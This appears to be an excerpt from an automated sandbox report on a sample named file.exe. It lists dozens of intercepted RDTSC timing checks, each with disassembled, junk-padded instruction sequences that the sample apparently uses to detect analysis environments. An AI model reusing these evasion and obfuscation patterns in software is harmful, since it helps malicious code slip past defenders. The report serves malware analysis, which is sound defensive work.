    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D78F second address: 77D79A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC83451D8A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D79A second address: 77D7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D961 second address: 77D967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D967 second address: 77D96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D96F second address: 77D97D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D97D second address: 77D98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FC834EB3D46h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D98C second address: 77D990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DC36 second address: 77DC3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DC3C second address: 77DC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DC42 second address: 77DC48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DC48 second address: 77DC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DC52 second address: 77DC56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DC56 second address: 77DC64 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDB6 second address: 77DDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDBC second address: 77DDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDC1 second address: 77DDC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDC7 second address: 77DDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDCB second address: 77DDD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FC834EB3D46h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780EFA second address: 780F04 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC83451D8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780F04 second address: 613BB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 62C75B32h 0x00000010 jmp 00007FC834EB3D4Ch 0x00000015 push dword ptr [ebp+122D11DDh] 0x0000001b mov dx, 694Ah 0x0000001f call dword ptr [ebp+122D1C06h] 0x00000025 pushad 0x00000026 pushad 0x00000027 jbe 00007FC834EB3D47h 0x0000002d cmc 0x0000002e popad 0x0000002f pushad 0x00000030 jmp 00007FC834EB3D4Eh 0x00000035 mov ebx, dword ptr [ebp+122D37DEh] 0x0000003b popad 0x0000003c xor eax, eax 0x0000003e jbe 00007FC834EB3D4Ch 0x00000044 mov edx, dword ptr [esp+28h] 0x00000048 jnp 00007FC834EB3D59h 0x0000004e jmp 00007FC834EB3D53h 0x00000053 mov dword ptr [ebp+122D3A76h], eax 0x00000059 clc 0x0000005a mov esi, 0000003Ch 0x0000005f sub dword ptr [ebp+122D36B3h], edi 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 jnl 00007FC834EB3D4Dh 0x0000006f lodsw 0x00000071 jmp 00007FC834EB3D51h 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a sub dword ptr [ebp+122D230Bh], ebx 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 mov dword ptr [ebp+122D230Bh], edx 0x0000008a nop 0x0000008b jbe 00007FC834EB3D62h 0x00000091 pushad 0x00000092 jmp 00007FC834EB3D54h 0x00000097 push eax 0x00000098 push edx 0x00000099 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780F4F second address: 780FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83451D8ABh 0x00000009 popad 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, edx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FC83451D8A8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c pushad 0x0000002d sbb cl, 00000076h 0x00000030 mov edi, eax 0x00000032 popad 0x00000033 push EC0B145Fh 0x00000038 pushad 0x00000039 push esi 0x0000003a jne 00007FC83451D8A6h 0x00000040 pop esi 0x00000041 jmp 00007FC83451D8AAh 0x00000046 popad 0x00000047 add dword ptr [esp], 13F4EC21h 0x0000004e push 00000003h 0x00000050 jg 00007FC83451D8A6h 0x00000056 push 00000000h 0x00000058 push edi 0x00000059 xor dword ptr [ebp+122D279Ch], ebx 0x0000005f pop esi 0x00000060 mov ecx, eax 0x00000062 push 00000003h 0x00000064 jmp 00007FC83451D8B2h 0x00000069 push 8688116Ah 0x0000006e push edi 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781103 second address: 781134 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC834EB3D51h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 jbe 00007FC834EB3D4Ch 0x00000016 jc 00007FC834EB3D46h 0x0000001c pop esi 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781134 second address: 781138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781138 second address: 78113E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78121A second address: 781220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781220 second address: 781224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781224 second address: 78123A instructions: 0x00000000 rdtsc 0x00000002 je 00007FC83451D8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78123A second address: 781248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781248 second address: 78126C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83451D8B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jl 00007FC83451D8B4h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7813CF second address: 7813D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7813D3 second address: 7813FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83451D8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jmp 00007FC83451D8AAh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7813FB second address: 781401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79FC5A second address: 79FC64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC83451D8A6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79FF2E second address: 79FF3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC834EB3D46h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79FF3A second address: 79FF40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A00D2 second address: 7A00D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A04DC second address: 7A0500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83451D8B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FC83451D8AEh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A065D second address: 7A0661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A078C second address: 7A0790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0790 second address: 7A07A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D50h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A07A4 second address: 7A07B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007FC83451D8A6h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A08E9 second address: 7A08ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A08ED second address: 7A0908 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC83451D8ABh 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0908 second address: 7A092F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC834EB3D46h 0x00000008 jmp 00007FC834EB3D53h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FC834EB3D46h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A092F second address: 7A0939 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC83451D8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796064 second address: 79606F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007FC834EB3D46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1A4C second address: 7A1A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edi 0x00000007 jc 00007FC83451D8A6h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7D49 second address: 7A7D53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC834EB3D46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7EB6 second address: 7A7EBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A65FA second address: 7A65FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ADB99 second address: 7ADB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ADB9D second address: 7ADBAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007FC834EB3D52h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ADBAC second address: 7ADBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ADBB2 second address: 7ADBCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FC834EB3D51h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ADBCA second address: 7ADBED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007FC83451D8AEh 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC83451D8A6h 0x00000015 jnl 00007FC83451D8A6h 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ADBED second address: 7ADC0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D59h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AD217 second address: 7AD21D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AD21D second address: 7AD223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AD34C second address: 7AD37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83451D8B2h 0x00000009 popad 0x0000000a jmp 00007FC83451D8B8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AD37F second address: 7AD38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC834EB3D4Bh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AD4CF second address: 7AD4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a ja 00007FC83451D8A6h 0x00000010 pop edx 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AD4E6 second address: 7AD4EC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF067 second address: 7AF06B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF15D second address: 7AF179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC834EB3D55h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF179 second address: 7AF17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF17D second address: 7AF193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FC834EB3D4Ch 0x00000010 jne 00007FC834EB3D46h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF193 second address: 7AF19D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC83451D8A6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFE7E second address: 7AFE8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B085A second address: 7B0860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B130A second address: 7B130E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1200 second address: 7B1206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2524 second address: 7B252A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2F3A second address: 7B2F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2F3E second address: 7B2F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4D36 second address: 7B4D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC83451D8ABh 0x00000008 jmp 00007FC83451D8ABh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FC83451D8A8h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4D5D second address: 7B4D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FC834EB3D59h 0x0000000f push 00000000h 0x00000011 movsx esi, si 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D3AB2h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 jl 00007FC834EB3D46h 0x00000028 popad 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B588B second address: 7B5912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FC83451D8A8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov edi, 27BF664Fh 0x00000029 push 00000000h 0x0000002b mov di, 8316h 0x0000002f push 00000000h 0x00000031 pushad 0x00000032 pushad 0x00000033 add dx, 577Dh 0x00000038 call 00007FC83451D8B5h 0x0000003d pop ebx 0x0000003e popad 0x0000003f xor dword ptr [ebp+1243FC60h], esi 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 jmp 00007FC83451D8B0h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push ebx 0x00000050 jmp 00007FC83451D8B5h 0x00000055 pop ebx 0x00000056 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5682 second address: 7B5686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5912 second address: 7B5918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9642 second address: 7B9655 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC834EB3D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007FC834EB3D46h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9C33 second address: 7B9C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9C37 second address: 7B9C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9C44 second address: 7B9C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9C49 second address: 7B9CC5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC834EB3D48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, dword ptr [ebp+122D2B67h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FC834EB3D48h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov bx, 12EDh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FC834EB3D48h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d call 00007FC834EB3D55h 0x00000052 mov bh, al 0x00000054 pop ebx 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 jnc 00007FC834EB3D46h 0x0000005f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9CC5 second address: 7B9CE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83451D8B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9CE2 second address: 7B9CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BABF0 second address: 7BABF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
